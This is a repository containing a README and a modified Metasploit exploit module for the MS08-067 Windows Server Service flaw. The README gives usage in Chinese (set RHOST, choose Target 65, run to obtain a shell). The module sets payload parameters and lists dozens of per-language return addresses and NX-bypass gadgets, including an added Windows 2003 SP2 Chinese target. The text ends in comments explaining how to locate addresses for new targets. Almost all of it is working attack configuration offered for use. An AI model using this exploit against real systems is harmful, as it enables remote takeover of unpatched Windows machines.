├── README.md └── ms08_067_netapi.rb /README.md: -------------------------------------------------------------------------------- 1 | ms08-067_Server_2003_Chinese_Version 2 | 3 | ## 使用方法 ## 4 | 覆盖文件(在`/usr/share`下) 5 | ``` 6 | use exploit/windows/smb/ms08-067_netapi 7 | set RHOST 192.168.1.11 8 | set Target 65 9 | run 10 | ``` 11 | 即可得到shell 12 | 来源[戳我](http://bbs.pediy.com/thread-186737.htm) 13 | -------------------------------------------------------------------------------- /ms08_067_netapi.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Exploit::Remote 9 | Rank = GreatRanking 10 | 11 | include Msf::Exploit::Remote::DCERPC 12 | include Msf::Exploit::Remote::SMB::Client 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'MS08-067 Microsoft Server Service Relative Path Stack Corruption', 17 | 'Description' => %q{ 18 | This module exploits a parsing flaw in the path canonicalization code of 19 | NetAPI32.dll through the Server Service. This module is capable of bypassing 20 | NX on some operating systems and service packs. The correct target must be 21 | used to prevent the Server Service (along with a dozen others in the same 22 | process) from crashing. Windows XP targets seem to handle multiple successful 23 | exploitation events, but 2003 targets will often crash or hang on subsequent 24 | attempts. This is just the first version of this module, full support for 25 | NX bypass on 2003, along with other platforms, is still in development. 26 | }, 27 | 'Author' => 28 | [ 29 | 'hdm', # with tons of input/help/testing from the community 30 | 'Brett Moore ', 31 | 'frank2 ', # check() detection 32 | 'jduck', # XP SP2/SP3 AlwaysOn DEP bypass 33 | ], 34 | 'License' => MSF_LICENSE, 35 | 'References' => 36 | [ 37 | %w(CVE 2008-4250), 38 | %w(OSVDB 49243), 39 | %w(MSB MS08-067), 40 | # If this vulnerability is found, ms08-67 is exposed as well 41 | ['URL', 'http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos'] 42 | ], 43 | 'DefaultOptions' => 44 | { 45 | 'EXITFUNC' => 'thread', 46 | }, 47 | 'Privileged' => true, 48 | 'Payload' => 49 | { 50 | 'Space' => 408, 51 | 'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40", 52 | 'Prepend' => "\x81\xE4\xF0\xFF\xFF\xFF", # stack alignment 53 | 'StackAdjustment' => -3500, 54 | 55 | }, 56 | 'Platform' => 'win', 57 | 'DefaultTarget' => 0, 58 | 'Targets' => 59 | [ 60 | # 61 | # Automatic targetting via fingerprinting 62 | # 63 | ['Automatic Targeting', { 'auto' => true }], 64 | 65 | # 66 | # UNIVERSAL TARGETS 67 | # 68 | 69 | # 70 | # Antoine's universal for Windows 2000 71 | # Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET 72 | # 73 | ['Windows 2000 Universal', 74 | { 75 | 'Ret' => 0x001f1cb0, 76 | 'Scratch' => 0x00020408, 77 | } 78 | ], # JMP EDI SVCHOST.EXE 79 | 80 | # 81 | # Standard return-to-ESI without NX bypass 82 | # Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET 83 | # 84 | ['Windows XP SP0/SP1 Universal', 85 | { 86 | 'Ret' => 0x01001361, 87 | 'Scratch' => 0x00020408, 88 | } 89 | ], # JMP ESI SVCHOST.EXE 90 | 91 | # Standard return-to-ESI without NX bypass 92 | ['Windows 2003 SP0 Universal', 93 | { 94 | 'Ret' => 0x0100129e, 95 | 'Scratch' => 0x00020408, 96 | } 97 | ], # JMP ESI SVCHOST.EXE 98 | 99 | # 100 | # ENGLISH TARGETS 101 | # 102 | 103 | # jduck's AlwaysOn NX Bypass for XP SP2 104 | ['Windows XP SP2 English (AlwaysOn NX)', 105 | { 106 | # No pivot is needed, we drop into our rop 107 | 'Scratch' => 0x00020408, 108 | 'UseROP' => '5.1.2600.2180' 109 | } 110 | ], 111 | 112 | # Metasploit's NX bypass for XP SP2/SP3 113 | ['Windows XP SP2 English (NX)', 114 | { 115 | 'Ret' => 0x6f88f727, 116 | 'DisableNX' => 0x6f8916e2, 117 | 'Scratch' => 0x00020408 118 | } 119 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 120 | 121 | # jduck's AlwaysOn NX Bypass for XP SP3 122 | ['Windows XP SP3 English (AlwaysOn NX)', 123 | { 124 | # No pivot is needed, we drop into our rop 125 | 'Scratch' => 0x00020408, 126 | 'UseROP' => '5.1.2600.5512' 127 | } 128 | ], 129 | 130 | # Metasploit's NX bypass for XP SP2/SP3 131 | ['Windows XP SP3 English (NX)', 132 | { 133 | 'Ret' => 0x6f88f807, 134 | 'DisableNX' => 0x6f8917c2, 135 | 'Scratch' => 0x00020408 136 | } 137 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 138 | 139 | # 140 | # NON-ENGLISH TARGETS - AUTOMATICALLY GENERATED 141 | # 142 | 143 | # Metasploit's NX bypass for XP SP2/SP3 144 | ['Windows XP SP2 Arabic (NX)', 145 | { 146 | 'Ret' => 0x6fd8f727, 147 | 'DisableNX' => 0x6fd916e2, 148 | 'Scratch' => 0x00020408 149 | } 150 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 151 | 152 | # Metasploit's NX bypass for XP SP2/SP3 153 | ['Windows XP SP2 Chinese - Traditional / Taiwan (NX)', 154 | { 155 | 'Ret' => 0x5860f727, 156 | 'DisableNX' => 0x586116e2, 157 | 'Scratch' => 0x00020408 158 | } 159 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 160 | 161 | # Metasploit's NX bypass for XP SP2/SP3 162 | ['Windows XP SP2 Chinese - Simplified (NX)', 163 | { 164 | 'Ret' => 0x58fbf727, 165 | 'DisableNX' => 0x58fc16e2, 166 | 'Scratch' => 0x00020408 167 | } 168 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 169 | 170 | # Metasploit's NX bypass for XP SP2/SP3 171 | ['Windows XP SP2 Chinese - Traditional (NX)', 172 | { 173 | 'Ret' => 0x5860f727, 174 | 'DisableNX' => 0x586116e2, 175 | 'Scratch' => 0x00020408 176 | } 177 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 178 | 179 | # Metasploit's NX bypass for XP SP2/SP3 180 | ['Windows XP SP2 Czech (NX)', 181 | { 182 | 'Ret' => 0x6fe1f727, 183 | 'DisableNX' => 0x6fe216e2, 184 | 'Scratch' => 0x00020408 185 | } 186 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 187 | 188 | # Metasploit's NX bypass for XP SP2/SP3 189 | ['Windows XP SP2 Danish (NX)', 190 | { 191 | 'Ret' => 0x5978f727, 192 | 'DisableNX' => 0x597916e2, 193 | 'Scratch' => 0x00020408 194 | } 195 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 196 | 197 | # Metasploit's NX bypass for XP SP2/SP3 198 | ['Windows XP SP2 German (NX)', 199 | { 200 | 'Ret' => 0x6fd9f727, 201 | 'DisableNX' => 0x6fda16e2, 202 | 'Scratch' => 0x00020408 203 | } 204 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 205 | 206 | # Metasploit's NX bypass for XP SP2/SP3 207 | ['Windows XP SP2 Greek (NX)', 208 | { 209 | 'Ret' => 0x592af727, 210 | 'DisableNX' => 0x592b16e2, 211 | 'Scratch' => 0x00020408 212 | } 213 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 214 | 215 | # Metasploit's NX bypass for XP SP2/SP3 216 | ['Windows XP SP2 Spanish (NX)', 217 | { 218 | 'Ret' => 0x6fdbf727, 219 | 'DisableNX' => 0x6fdc16e2, 220 | 'Scratch' => 0x00020408 221 | } 222 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 223 | 224 | # Metasploit's NX bypass for XP SP2/SP3 225 | ['Windows XP SP2 Finnish (NX)', 226 | { 227 | 'Ret' => 0x597df727, 228 | 'DisableNX' => 0x597e16e2, 229 | 'Scratch' => 0x00020408 230 | } 231 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 232 | 233 | # Metasploit's NX bypass for XP SP2/SP3 234 | ['Windows XP SP2 French (NX)', 235 | { 236 | 'Ret' => 0x595bf727, 237 | 'DisableNX' => 0x595c16e2, 238 | 'Scratch' => 0x00020408 239 | } 240 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 241 | 242 | # Metasploit's NX bypass for XP SP2/SP3 243 | ['Windows XP SP2 Hebrew (NX)', 244 | { 245 | 'Ret' => 0x5940f727, 246 | 'DisableNX' => 0x594116e2, 247 | 'Scratch' => 0x00020408 248 | } 249 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 250 | 251 | # Metasploit's NX bypass for XP SP2/SP3 252 | ['Windows XP SP2 Hungarian (NX)', 253 | { 254 | 'Ret' => 0x5970f727, 255 | 'DisableNX' => 0x597116e2, 256 | 'Scratch' => 0x00020408 257 | } 258 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 259 | 260 | # Metasploit's NX bypass for XP SP2/SP3 261 | ['Windows XP SP2 Italian (NX)', 262 | { 263 | 'Ret' => 0x596bf727, 264 | 'DisableNX' => 0x596c16e2, 265 | 'Scratch' => 0x00020408 266 | } 267 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 268 | 269 | # Metasploit's NX bypass for XP SP2/SP3 270 | ['Windows XP SP2 Japanese (NX)', 271 | { 272 | 'Ret' => 0x567fd3be, 273 | 'DisableNX' => 0x568016e2, 274 | 'Scratch' => 0x00020408 275 | } 276 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 277 | 278 | # Metasploit's NX bypass for XP SP2/SP3 279 | ['Windows XP SP2 Korean (NX)', 280 | { 281 | 'Ret' => 0x6fd6f727, 282 | 'DisableNX' => 0x6fd716e2, 283 | 'Scratch' => 0x00020408 284 | } 285 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 286 | 287 | # Metasploit's NX bypass for XP SP2/SP3 288 | ['Windows XP SP2 Dutch (NX)', 289 | { 290 | 'Ret' => 0x596cf727, 291 | 'DisableNX' => 0x596d16e2, 292 | 'Scratch' => 0x00020408 293 | } 294 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 295 | 296 | # Metasploit's NX bypass for XP SP2/SP3 297 | ['Windows XP SP2 Norwegian (NX)', 298 | { 299 | 'Ret' => 0x597cf727, 300 | 'DisableNX' => 0x597d16e2, 301 | 'Scratch' => 0x00020408 302 | } 303 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 304 | 305 | # Metasploit's NX bypass for XP SP2/SP3 306 | ['Windows XP SP2 Polish (NX)', 307 | { 308 | 'Ret' => 0x5941f727, 309 | 'DisableNX' => 0x594216e2, 310 | 'Scratch' => 0x00020408 311 | } 312 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 313 | 314 | # Metasploit's NX bypass for XP SP2/SP3 315 | ['Windows XP SP2 Portuguese - Brazilian (NX)', 316 | { 317 | 'Ret' => 0x596ff727, 318 | 'DisableNX' => 0x597016e2, 319 | 'Scratch' => 0x00020408 320 | } 321 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 322 | 323 | # Metasploit's NX bypass for XP SP2/SP3 324 | ['Windows XP SP2 Portuguese (NX)', 325 | { 326 | 'Ret' => 0x596bf727, 327 | 'DisableNX' => 0x596c16e2, 328 | 'Scratch' => 0x00020408 329 | } 330 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 331 | 332 | # Metasploit's NX bypass for XP SP2/SP3 333 | ['Windows XP SP2 Russian (NX)', 334 | { 335 | 'Ret' => 0x6fe1f727, 336 | 'DisableNX' => 0x6fe216e2, 337 | 'Scratch' => 0x00020408 338 | } 339 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 340 | 341 | # Metasploit's NX bypass for XP SP2/SP3 342 | ['Windows XP SP2 Swedish (NX)', 343 | { 344 | 'Ret' => 0x597af727, 345 | 'DisableNX' => 0x597b16e2, 346 | 'Scratch' => 0x00020408 347 | } 348 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 349 | 350 | # Metasploit's NX bypass for XP SP2/SP3 351 | ['Windows XP SP2 Turkish (NX)', 352 | { 353 | 'Ret' => 0x5a78f727, 354 | 'DisableNX' => 0x5a7916e2, 355 | 'Scratch' => 0x00020408 356 | } 357 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 358 | 359 | # Metasploit's NX bypass for XP SP2/SP3 360 | ['Windows XP SP3 Arabic (NX)', 361 | { 362 | 'Ret' => 0x6fd8f807, 363 | 'DisableNX' => 0x6fd917c2, 364 | 'Scratch' => 0x00020408 365 | } 366 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 367 | 368 | # Metasploit's NX bypass for XP SP2/SP3 369 | ['Windows XP SP3 Chinese - Traditional / Taiwan (NX)', 370 | { 371 | 'Ret' => 0x5860f807, 372 | 'DisableNX' => 0x586117c2, 373 | 'Scratch' => 0x00020408 374 | } 375 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 376 | 377 | # Metasploit's NX bypass for XP SP2/SP3 378 | ['Windows XP SP3 Chinese - Simplified (NX)', 379 | { 380 | 'Ret' => 0x58fbf807, 381 | 'DisableNX' => 0x58fc17c2, 382 | 'Scratch' => 0x00020408 383 | } 384 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 385 | 386 | # Metasploit's NX bypass for XP SP2/SP3 387 | ['Windows XP SP3 Chinese - Traditional (NX)', 388 | { 389 | 'Ret' => 0x5860f807, 390 | 'DisableNX' => 0x586117c2, 391 | 'Scratch' => 0x00020408 392 | } 393 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 394 | 395 | # Metasploit's NX bypass for XP SP2/SP3 396 | ['Windows XP SP3 Czech (NX)', 397 | { 398 | 'Ret' => 0x6fe1f807, 399 | 'DisableNX' => 0x6fe217c2, 400 | 'Scratch' => 0x00020408 401 | } 402 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 403 | 404 | # Metasploit's NX bypass for XP SP2/SP3 405 | ['Windows XP SP3 Danish (NX)', 406 | { 407 | 'Ret' => 0x5978f807, 408 | 'DisableNX' => 0x597917c2, 409 | 'Scratch' => 0x00020408 410 | } 411 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 412 | 413 | # Metasploit's NX bypass for XP SP2/SP3 414 | ['Windows XP SP3 German (NX)', 415 | { 416 | 'Ret' => 0x6fd9f807, 417 | 'DisableNX' => 0x6fda17c2, 418 | 'Scratch' => 0x00020408 419 | } 420 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 421 | 422 | # Metasploit's NX bypass for XP SP2/SP3 423 | ['Windows XP SP3 Greek (NX)', 424 | { 425 | 'Ret' => 0x592af807, 426 | 'DisableNX' => 0x592b17c2, 427 | 'Scratch' => 0x00020408 428 | } 429 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 430 | 431 | # Metasploit's NX bypass for XP SP2/SP3 432 | ['Windows XP SP3 Spanish (NX)', 433 | { 434 | 'Ret' => 0x6fdbf807, 435 | 'DisableNX' => 0x6fdc17c2, 436 | 'Scratch' => 0x00020408 437 | } 438 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 439 | 440 | # Metasploit's NX bypass for XP SP2/SP3 441 | ['Windows XP SP3 Finnish (NX)', 442 | { 443 | 'Ret' => 0x597df807, 444 | 'DisableNX' => 0x597e17c2, 445 | 'Scratch' => 0x00020408 446 | } 447 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 448 | 449 | # Metasploit's NX bypass for XP SP2/SP3 450 | ['Windows XP SP3 French (NX)', 451 | { 452 | 'Ret' => 0x595bf807, 453 | 'DisableNX' => 0x595c17c2, 454 | 'Scratch' => 0x00020408 455 | } 456 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 457 | 458 | # Metasploit's NX bypass for XP SP2/SP3 459 | ['Windows XP SP3 Hebrew (NX)', 460 | { 461 | 'Ret' => 0x5940f807, 462 | 'DisableNX' => 0x594117c2, 463 | 'Scratch' => 0x00020408 464 | } 465 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 466 | 467 | # Metasploit's NX bypass for XP SP2/SP3 468 | ['Windows XP SP3 Hungarian (NX)', 469 | { 470 | 'Ret' => 0x5970f807, 471 | 'DisableNX' => 0x597117c2, 472 | 'Scratch' => 0x00020408 473 | } 474 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 475 | 476 | # Metasploit's NX bypass for XP SP2/SP3 477 | ['Windows XP SP3 Italian (NX)', 478 | { 479 | 'Ret' => 0x596bf807, 480 | 'DisableNX' => 0x596c17c2, 481 | 'Scratch' => 0x00020408 482 | } 483 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 484 | 485 | # Metasploit's NX bypass for XP SP2/SP3 486 | ['Windows XP SP3 Japanese (NX)', 487 | { 488 | 'Ret' => 0x567fd4d2, 489 | 'DisableNX' => 0x568017c2, 490 | 'Scratch' => 0x00020408 491 | } 492 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 493 | 494 | # Metasploit's NX bypass for XP SP2/SP3 495 | ['Windows XP SP3 Korean (NX)', 496 | { 497 | 'Ret' => 0x6fd6f807, 498 | 'DisableNX' => 0x6fd717c2, 499 | 'Scratch' => 0x00020408 500 | } 501 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 502 | 503 | # Metasploit's NX bypass for XP SP2/SP3 504 | ['Windows XP SP3 Dutch (NX)', 505 | { 506 | 'Ret' => 0x596cf807, 507 | 'DisableNX' => 0x596d17c2, 508 | 'Scratch' => 0x00020408 509 | } 510 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 511 | 512 | # Metasploit's NX bypass for XP SP2/SP3 513 | ['Windows XP SP3 Norwegian (NX)', 514 | { 515 | 'Ret' => 0x597cf807, 516 | 'DisableNX' => 0x597d17c2, 517 | 'Scratch' => 0x00020408 518 | } 519 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 520 | 521 | # Metasploit's NX bypass for XP SP2/SP3 522 | ['Windows XP SP3 Polish (NX)', 523 | { 524 | 'Ret' => 0x5941f807, 525 | 'DisableNX' => 0x594217c2, 526 | 'Scratch' => 0x00020408 527 | } 528 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 529 | 530 | # Metasploit's NX bypass for XP SP2/SP3 531 | ['Windows XP SP3 Portuguese - Brazilian (NX)', 532 | { 533 | 'Ret' => 0x596ff807, 534 | 'DisableNX' => 0x597017c2, 535 | 'Scratch' => 0x00020408 536 | } 537 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 538 | 539 | # Metasploit's NX bypass for XP SP2/SP3 540 | ['Windows XP SP3 Portuguese (NX)', 541 | { 542 | 'Ret' => 0x596bf807, 543 | 'DisableNX' => 0x596c17c2, 544 | 'Scratch' => 0x00020408 545 | } 546 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 547 | 548 | # Metasploit's NX bypass for XP SP2/SP3 549 | ['Windows XP SP3 Russian (NX)', 550 | { 551 | 'Ret' => 0x6fe1f807, 552 | 'DisableNX' => 0x6fe217c2, 553 | 'Scratch' => 0x00020408 554 | } 555 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 556 | 557 | # Metasploit's NX bypass for XP SP2/SP3 558 | ['Windows XP SP3 Swedish (NX)', 559 | { 560 | 'Ret' => 0x597af807, 561 | 'DisableNX' => 0x597b17c2, 562 | 'Scratch' => 0x00020408 563 | } 564 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 565 | 566 | # Metasploit's NX bypass for XP SP2/SP3 567 | ['Windows XP SP3 Turkish (NX)', 568 | { 569 | 'Ret' => 0x5a78f807, 570 | 'DisableNX' => 0x5a7917c2, 571 | 'Scratch' => 0x00020408 572 | } 573 | ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL 574 | 575 | # 576 | # Windows 2003 Targets 577 | # 578 | 579 | # Standard return-to-ESI without NX bypass 580 | ['Windows 2003 SP1 English (NO NX)', 581 | { 582 | 'Ret' => 0x71bf21a2, 583 | 'Scratch' => 0x00020408, 584 | } 585 | ], # JMP ESI WS2HELP.DLL 586 | 587 | # Brett Moore's crafty NX bypass for 2003 SP1 588 | ['Windows 2003 SP1 English (NX)', 589 | { 590 | 'RetDec' => 0x7c90568c, # dec ESI, ret @SHELL32.DLL 591 | 'RetPop' => 0x7ca27cf4, # push ESI, pop EBP, ret @SHELL32.DLL 592 | 'JmpESP' => 0x7c86fed3, # jmp ESP @NTDLL.DLL 593 | 'DisableNX' => 0x7c83e413, # NX disable @NTDLL.DLL 594 | 'Scratch' => 0x00020408, 595 | } 596 | ], 597 | 598 | # Standard return-to-ESI without NX bypass 599 | ['Windows 2003 SP1 Japanese (NO NX)', 600 | { 601 | 'Ret' => 0x71a921a2, 602 | 'Scratch' => 0x00020408, 603 | } 604 | ], # JMP ESI WS2HELP.DLL 605 | 606 | # Standard return-to-ESI without NX bypass 607 | ['Windows 2003 SP1 Spanish (NO NX)', 608 | { 609 | 'Ret' => 0x71ac21a2, 610 | 'Scratch' => 0x00020408, 611 | } 612 | ], # JMP ESI WS2HELP.DLL 613 | 614 | # Brett Moore's crafty NX bypass for 2003 SP1 615 | ['Windows 2003 SP1 Spanish (NX)', 616 | { 617 | 'RetDec' => 0x7c90568c, # dec ESI, ret @SHELL32.DLL 618 | 'RetPop' => 0x7ca27cf4, # push ESI, pop EBP, ret @SHELL32.DLL 619 | 'JmpESP' => 0x7c86fed3, # jmp ESP @NTDLL.DLL 620 | 'DisableNX' => 0x7c83e413, # NX disable @NTDLL.DLL 621 | 'Scratch' => 0x00020408, 622 | } 623 | ], 624 | # Standard return-to-ESI without NX bypass 625 | # Added by Omar MEZRAG - 0xFFFFFF 626 | [ 'Windows 2003 SP1 French (NO NX)', 627 | { 628 | 'Ret' => 0x71ac1c40 , 629 | 'Scratch' => 0x00020408 630 | } 631 | ], # JMP ESI WS2HELP.DLL 632 | 633 | # Brett Moore's crafty NX bypass for 2003 SP1 634 | # Added by Omar MEZRAG - 0xFFFFFF 635 | [ 'Windows 2003 SP1 French (NX)', 636 | { 637 | 'RetDec' => 0x7CA2568C, # dec ESI, ret @SHELL32.DLL 638 | 'RetPop' => 0x7CB47CF4, # push ESI, pop EBP, ret 4 @SHELL32.DLL 639 | 'JmpESP' => 0x7C98FED3, # jmp ESP @NTDLL.DLL 640 | 'DisableNX' => 0x7C95E413, # NX disable @NTDLL.DLL 641 | 'Scratch' => 0x00020408 642 | } 643 | ], 644 | 645 | # Standard return-to-ESI without NX bypass 646 | ['Windows 2003 SP2 English (NO NX)', 647 | { 648 | 'Ret' => 0x71bf3969, 649 | 'Scratch' => 0x00020408, 650 | } 651 | ], # JMP ESI WS2HELP.DLL 652 | 653 | # Brett Moore's crafty NX bypass for 2003 SP2 654 | ['Windows 2003 SP2 English (NX)', 655 | { 656 | 'RetDec' => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL 657 | 'RetPop' => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL 658 | 'JmpESP' => 0x7c86a01b, # jmp ESP @NTDLL.DLL 659 | 'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL 660 | 'Scratch' => 0x00020408, 661 | } 662 | ], 663 | #my add 664 | [ 'Windows 2003 SP2 Chinese (NX)', 665 | { 666 | 'RetDec' => 0x7c99beb8, # dec ESI, ret @NTDLL.DLL (0x4EC3) 667 | 'RetPop' => 0x7cb5e84e, # push ESI, pop EBP, ret @SHELL32.DLL(0x565DC3) 668 | 'JmpESP' => 0x7c99a01b, # jmp ESP @NTDLL.DLL(0xFFE4) 669 | 'DisableNX' => 0x7c96f517, # NX disable @NTDLL.DLL 670 | 'Scratch' => 0x00020408, 671 | } 672 | ], 673 | 674 | # Standard return-to-ESI without NX bypass 675 | ['Windows 2003 SP2 German (NO NX)', 676 | { 677 | 'Ret' => 0x71a03969, 678 | 'Scratch' => 0x00020408, 679 | } 680 | ], # JMP ESI WS2HELP.DLL 681 | 682 | # Brett Moore's crafty NX bypass for 2003 SP2 683 | ['Windows 2003 SP2 German (NX)', 684 | { 685 | 'RetDec' => 0x7c98beb8, # dec ESI, ret @NTDLL.DLL 686 | 'RetPop' => 0x7cb3e84e, # push ESI, pop EBP, ret @SHELL32.DLL 687 | 'JmpESP' => 0x7c98a01b, # jmp ESP @NTDLL.DLL 688 | 'DisableNX' => 0x7c95f517, # NX disable @NTDLL.DLL 689 | 'Scratch' => 0x00020408, 690 | } 691 | ], 692 | 693 | # Brett Moore's crafty NX bypass for 2003 SP2 (target by Anderson Bargas) 694 | [ 'Windows 2003 SP2 Portuguese - Brazilian (NX)', 695 | { 696 | 'RetDec' => 0x7c97beb8, # dec ESI, ret @NTDLL.DLL OK 697 | 'RetPop' => 0x7cb2e84e, # push ESI, pop EBP, ret @SHELL32.DLL OK 698 | 'JmpESP' => 0x7c97a01b, # jmp ESP @NTDLL.DLL OK 699 | 'DisableNX' => 0x7c94f517, # NX disable @NTDLL.DLL 700 | 'Scratch' => 0x00020408, 701 | } 702 | ], 703 | # Standard return-to-ESI without NX bypass 704 | ['Windows 2003 SP2 Spanish (NO NX)', 705 | { 706 | 'Ret' => 0x71ac3969, 707 | 'Scratch' => 0x00020408, 708 | } 709 | ], # JMP ESI WS2HELP.DLL 710 | 711 | # Brett Moore's crafty NX bypass for 2003 SP2 712 | ['Windows 2003 SP2 Spanish (NX)', 713 | { 714 | 'RetDec' => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL 715 | 'RetPop' => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL 716 | 'JmpESP' => 0x7c86a01b, # jmp ESP @NTDLL.DLL 717 | 'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL 718 | 'Scratch' => 0x00020408, 719 | } 720 | ], 721 | 722 | # Standard return-to-ESI without NX bypass 723 | # Provided by Masashi Fujiwara 724 | ['Windows 2003 SP2 Japanese (NO NX)', 725 | { 726 | 'Ret' => 0x71a91ed2, 727 | 'Scratch' => 0x00020408 728 | } 729 | ], # JMP ESI WS2HELP.DLL 730 | # Standard return-to-ESI without NX bypass 731 | # Added by Omar MEZRAG - 0xFFFFFF 732 | [ 'Windows 2003 SP2 French (NO NX)', 733 | { 734 | 'Ret' => 0x71AC2069, 735 | 'Scratch' => 0x00020408 736 | } 737 | ], # CALL ESI WS2HELP.DLL 738 | 739 | # Brett Moore's crafty NX bypass for 2003 SP2 740 | # Added by Omar MEZRAG - 0xFFFFFF 741 | [ 'Windows 2003 SP2 French (NX)', 742 | { 743 | 'RetDec' => 0x7C98BEB8, # dec ESI, ret @NTDLL.DLL 744 | 'RetPop' => 0x7CB3E84E, # push ESI, pop EBP, ret @SHELL32.DLL 745 | 'JmpESP' => 0x7C98A01B, # jmp ESP @NTDLL.DLL 746 | 'DisableNX' => 0x7C95F517, # NX disable @NTDLL.DLL 747 | 'Scratch' => 0x00020408 748 | } 749 | ], 750 | 751 | # 752 | # Missing Targets 753 | # Key: T=TODO ?=UNKNOWN U=UNRELIABLE 754 | # 755 | # [?] Windows Vista SP0 - Not tested yet 756 | # [?] Windows Vista SP1 - Not tested yet 757 | # 758 | ], 759 | 760 | 'DisclosureDate' => 'Oct 28 2008')) 761 | 762 | register_options( 763 | [ 764 | OptString.new('SMBPIPE', [true, 'The pipe name to use (BROWSER, SRVSVC)', 'BROWSER']), 765 | ], self.class) 766 | end 767 | 768 | # 769 | # 770 | # *** WINDOWS XP SP2/SP3 TARGETS *** 771 | # 772 | # 773 | # This exploit bypasses NX/NX by returning to a function call inside acgenral.dll that disables NX 774 | # for the process and then returns back to a call ESI instruction. These addresses are different 775 | # between operating systems, service packs, and language packs, but the steps below can be used to 776 | # add new targets. 777 | # 778 | # 779 | # If the target system does not have NX/NX, just place a "call ESI" return into both the Ret and 780 | # DisableNX elements of the target hash. 781 | # 782 | # If the target system does have NX/NX, obtain a copy of the acgenral.dll from that system. 783 | # First obtain the value for the Ret element of the hash with the following command: 784 | # 785 | # $ msfpescan -j esi acgenral.dll 786 | # 787 | # Pick whatever address you like, just make sure it does not contain 00 0a 0d 5c 2f or 2e. 788 | # 789 | # Next, find the location of the function we use to disable NX. Use the following command: 790 | # 791 | # $ msfpescan -r "\x6A\x04\x8D\x45\x08\x50\x6A\x22\x6A\xFF" acgenral.dll 792 | # 793 | # This address should be placed into the DisableNX element of the target hash. 794 